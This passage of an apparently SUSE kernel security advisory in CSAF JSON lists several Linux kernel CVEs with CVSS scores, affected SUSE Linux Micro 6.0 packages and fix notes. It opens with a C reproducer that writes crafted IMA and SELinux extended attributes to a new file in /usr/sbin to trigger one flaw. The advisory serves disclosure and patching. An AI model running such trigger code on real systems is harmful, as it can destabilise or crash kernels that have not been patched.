#include \u003cstdio.h\u003e\n #include \u003csys/xattr.h\u003e\n #include \u003cfcntl.h\u003e\n #include \u003cunistd.h\u003e\n #include \u003cstring.h\u003e\n #include \u003cstdlib.h\u003e\n\n int main() {\n const char* file_path = \"/usr/sbin/test_binary\";\n const char* hex_string = \"030204d33204490066306402304\";\n int length = strlen(hex_string);\n char* ima_attr_value;\n int fd;\n\n fd = open(file_path, O_WRONLY|O_CREAT|O_EXCL, 0644);\n if (fd == -1) {\n perror(\"Error opening file\");\n return 1;\n }\n\n ima_attr_value = (char*)malloc(length / 2 );\n for (int i = 0, j = 0; i \u003c length; i += 2, j++) {\n sscanf(hex_string + i, \"%2hhx\", \u0026ima_attr_value[j]);\n }\n\n if (fsetxattr(fd, \"security.ima\", ima_attr_value, length/2, 0) == -1) {\n perror(\"Error setting extended attribute\");\n close(fd);\n return 1;\n }\n\n const char* selinux_value= \"system_u:object_r:bin_t:s0\";\n if (fsetxattr(fd, \"security.selinux\", selinux_value, strlen(selinux_value), 0) == -1) {\n perror(\"Error setting extended attribute\");\n close(fd);\n return 1;\n }\n\n close(fd);\n\n return 0;\n }",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68183",
"url": "https://www.suse.com/security/cve/CVE-2025-68183"
},
{
"category": "external",
"summary": "SUSE Bug 1255251 for CVE-2025-68183",
"url": "https://bugzilla.suse.com/1255251"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68183"
},
{
"cve": "CVE-2025-68185",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68185"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfs4_setup_readdir(): insufficient locking for -\u003ed_parent-\u003ed_inode dereferencing\n\nTheoretically it\u0027s an oopsable race, but I don\u0027t believe one can manage\nto hit it on real hardware; might become doable on a KVM, but it still\nwon\u0027t be easy to attack.\n\nAnyway, it\u0027s easy to deal with - since xdr_encode_hyper() is just a call of\nput_unaligned_be64(), we can put that under -\u003ed_lock and be done with that.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68185",
"url": "https://www.suse.com/security/cve/CVE-2025-68185"
},
{
"category": "external",
"summary": "SUSE Bug 1255135 for CVE-2025-68185",
"url": "https://bugzilla.suse.com/1255135"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68185"
},
{
"cve": "CVE-2025-68188",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68188"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check()\n\nUse RCU to avoid a pair of atomic operations and a potential\nUAF on dst_dev()-\u003eflags.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68188",
"url": "https://www.suse.com/security/cve/CVE-2025-68188"
},
{
"category": "external",
"summary": "SUSE Bug 1255269 for CVE-2025-68188",
"url": "https://bugzilla.suse.com/1255269"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68188"
},
{
"cve": "CVE-2025-68190",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68190"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu/atom: Check kcalloc() for WS buffer in amdgpu_atom_execute_table_locked()\n\nkcalloc() may fail. When WS is non-zero and allocation fails, ectx.ws\nremains NULL while ectx.ws_size is set, leading to a potential NULL\npointer dereference in atom_get_src_int() when accessing WS entries.\n\nReturn -ENOMEM on allocation failure to avoid the NULL dereference.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68190",
"url": "https://www.suse.com/security/cve/CVE-2025-68190"
},
{
"category": "external",
"summary": "SUSE Bug 1255131 for CVE-2025-68190",
"url": "https://bugzilla.suse.com/1255131"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68190"
},
{
"cve": "CVE-2025-68192",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68192"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: qmi_wwan: initialize MAC header offset in qmimux_rx_fixup\n\nRaw IP packets have no MAC header, leaving skb-\u003emac_header uninitialized.\nThis can trigger kernel panics on ARM64 when xfrm or other subsystems\naccess the offset due to strict alignment checks.\n\nInitialize the MAC header to prevent such crashes.\n\nThis can trigger kernel panics on ARM when running IPsec over the\nqmimux0 interface.\n\nExample trace:\n\n Internal error: Oops: 000000009600004f [#1] SMP\n CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Not tainted 6.12.34-gbe78e49cb433 #1\n Hardware name: LS1028A RDB Board (DT)\n pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n pc : xfrm_input+0xde8/0x1318\n lr : xfrm_input+0x61c/0x1318\n sp : ffff800080003b20\n Call trace:\n xfrm_input+0xde8/0x1318\n xfrm6_rcv+0x38/0x44\n xfrm6_esp_rcv+0x48/0xa8\n ip6_protocol_deliver_rcu+0x94/0x4b0\n ip6_input_finish+0x44/0x70\n ip6_input+0x44/0xc0\n ipv6_rcv+0x6c/0x114\n __netif_receive_skb_one_core+0x5c/0x8c\n __netif_receive_skb+0x18/0x60\n process_backlog+0x78/0x17c\n __napi_poll+0x38/0x180\n net_rx_action+0x168/0x2f0",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68192",
"url": "https://www.suse.com/security/cve/CVE-2025-68192"
},
{
"category": "external",
"summary": "SUSE Bug 1255246 for CVE-2025-68192",
"url": "https://bugzilla.suse.com/1255246"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68192"
},
{
"cve": "CVE-2025-68194",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68194"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: imon: make send_packet() more robust\n\nsyzbot is reporting that imon has three problems which result in\nhung tasks due to forever holding device lock [1].\n\nFirst problem is that when usb_rx_callback_intf0() once got -EPROTO error\nafter ictx-\u003edev_present_intf0 became true, usb_rx_callback_intf0()\nresubmits urb after printk(), and resubmitted urb causes\nusb_rx_callback_intf0() to again get -EPROTO error. This results in\nprintk() flooding (RCU stalls).\n\nAlan Stern commented [2] that\n\n In theory it\u0027s okay to resubmit _if_ the driver has a robust\n error-recovery scheme (such as giving up after some fixed limit on the\n number of errors or after some fixed time has elapsed, perhaps with a\n time delay to prevent a flood of errors). Most drivers don\u0027t bother to\n do this; they simply give up right away. This makes them more\n vulnerable to short-term noise interference during USB transfers, but in\n reality such interference is quite rare. There\u0027s nothing really wrong\n with giving up right away.\n\nbut imon has a poor error-recovery scheme which just retries forever;\nthis behavior should be fixed.\n\nSince I\u0027m not sure whether it is safe for imon users to give up upon any\nerror code, this patch takes care of only union of error codes chosen from\nmodules in drivers/media/rc/ directory which handle -EPROTO error (i.e.\nir_toy, mceusb and igorplugusb).\n\nSecond problem is that when usb_rx_callback_intf0() once got -EPROTO error\nbefore ictx-\u003edev_present_intf0 becomes true, usb_rx_callback_intf0() always\nresubmits urb due to commit 8791d63af0cf (\"[media] imon: don\u0027t wedge\nhardware after early callbacks\"). Move the ictx-\u003edev_present_intf0 test\nintroduced by commit 6f6b90c9231a (\"[media] imon: don\u0027t parse scancodes\nuntil intf configured\") to immediately before imon_incoming_packet(), or\nthe first problem explained above happens without printk() flooding (i.e.\nhung task).\n\nThird problem is that when usb_rx_callback_intf0() is not called for some\nreason (e.g. flaky hardware; the reproducer for this problem sometimes\nprevents usb_rx_callback_intf0() from being called),\nwait_for_completion_interruptible() in send_packet() never returns (i.e.\nhung task). As a workaround for such situation, change send_packet() to\nwait for completion with timeout of 10 seconds.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68194",
"url": "https://www.suse.com/security/cve/CVE-2025-68194"
},
{
"category": "external",
"summary": "SUSE Bug 1255325 for CVE-2025-68194",
"url": "https://bugzilla.suse.com/1255325"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68194"
},
{
"cve": "CVE-2025-68195",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68195"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/CPU/AMD: Add missing terminator for zen5_rdseed_microcode\n\nRunning x86_match_min_microcode_rev() on a Zen5 CPU trips up KASAN for an out\nof bounds access.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68195",
"url": "https://www.suse.com/security/cve/CVE-2025-68195"
},
{
"category": "external",
"summary": "SUSE Bug 1255259 for CVE-2025-68195",
"url": "https://bugzilla.suse.com/1255259"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
